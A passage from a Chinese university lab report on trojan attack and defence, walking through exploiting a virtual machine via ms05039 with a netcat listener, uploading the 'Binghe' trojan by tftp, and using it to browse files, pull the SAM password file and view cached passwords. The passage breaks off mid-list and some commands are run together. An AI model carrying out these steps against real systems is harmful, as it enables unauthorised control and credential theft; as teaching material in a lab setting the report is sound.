2021年计算机网络安全实验报告 .pdfVIP

《计算机网络安全》试验汇报

试验序号:7试验项目名称:木马攻击与防范试验

学号姓名专业、班

试验地点实1-411指导老师试验时间-11-22

一、试验目及要求

了解和掌握木马传输和运行机制,掌握检验和删除木马技巧,学会防御木马相

关知识,加深对木马安全防范意识。

二、试验设备（环境）及要求

Windowsserver,虚拟机

三、试验内容与步骤

试验任务一:“冰河”木马

本试验需要把真实主机作为攻击机,虚拟机作为靶机。即首先利用ms05039

溢出工具入侵虚拟机,然后利用“冰河”木马实现对虚拟机完全控制。最终对木马

进行查杀。

试验任务二:“广外男生”木马

本试验将真实机作为攻击机,虚拟机作为靶机。真实机利用“广外男生”木马

对虚拟机进行攻击,最终完全取得虚拟机控制权。最终学习木马查杀。

四、试验结果与数据处理

试验任务一:“冰河”木马

步骤1:入侵准备工作

1）下载和安装木马软件前,关闭杀毒软件自动防护功效,避免程序会被看成

病毒而强行终止。

2）运行G_CLIENT.EXE;

3）选择菜单“设置”-“配置服务程序”;

4）设置访问口令为“1234567”,其它为默认值,点击“确定”生成木马服

务端程序G_SERVER.EXE。

5）将生成木马服务程序G_SERVER.EXE拷贝到tftp服务目录即C:\攻防

\tftp32。

6）运行tftpd32.exe。保持此程序一直开启,用于等候攻击成功后传输木马

服务程序。

步骤2:进行攻击,将木马放置在被攻击端

1)对靶机P3进行攻击,首先运行

nc-vv-l-p99

接着再开一个dos窗口,运行

ms050393991

2)攻击成功后,在运行nc-vv-l-p99dos窗口中出现提醒,若攻击不成

功请参考“缓冲区溢出攻击与防范试验”,再次进行攻击。

3）在此窗口中运行

tftp-igetg_server.exe

将木马服务程序G_server.exe上传到靶机P3上,并直接输入g_server.exe

使之运行。

步骤3:运行木马用户程序控制远程主机

1）打开程序端程序,单击快捷工具栏中“添加主机”按扭,如图8所表示。

✓“显示名称”:填入显示在主界面名称“target”

✓“主机地址”:填入服务器端主机IP地址“3”。

✓“访问口令”:填入每次访问主机密码,这里输入“1234567”。

✓“监听端口”:“冰河”默认监听端口是7626,控制端能够修改它以

绕过防火墙。

单击“确定”按扭,即能够看到主机面上添加了主机。

这时我们就能够像操作自己电脑一样操作远程目标电脑,比如打开

C:\WINNT\system32\config目录能够找到对方主机上保留用户口令SAM文件。点

击鼠标右键,能够发觉有上传和下载功效。即能够随意将虚拟机器上机密文件下载

到本机上,也能够把恶意文件上传到该虚拟机上并运行。可见,其破坏性是巨大。

2）“文件管理器”使用。点击各个驱动器或者文件夹前面展开符号,能够浏

览目标主机内容。

然后选汉字件,在右键菜单中选中“下载文件至...”,在弹出对话框中选好

当地存放路径,点击“保留”。

2）“命令控制台”使用。单击“命令控制台”标签,弹出命令控制台界面,验

证控制多种命令。

a.口令类命令:展开“口令类命令”,

a.1“系统信息及口令”能够查看远程主机系统信息,开机口令,缓存口令等。

a.2“历史口令”能够查看远程主机以往使用口令。

a.3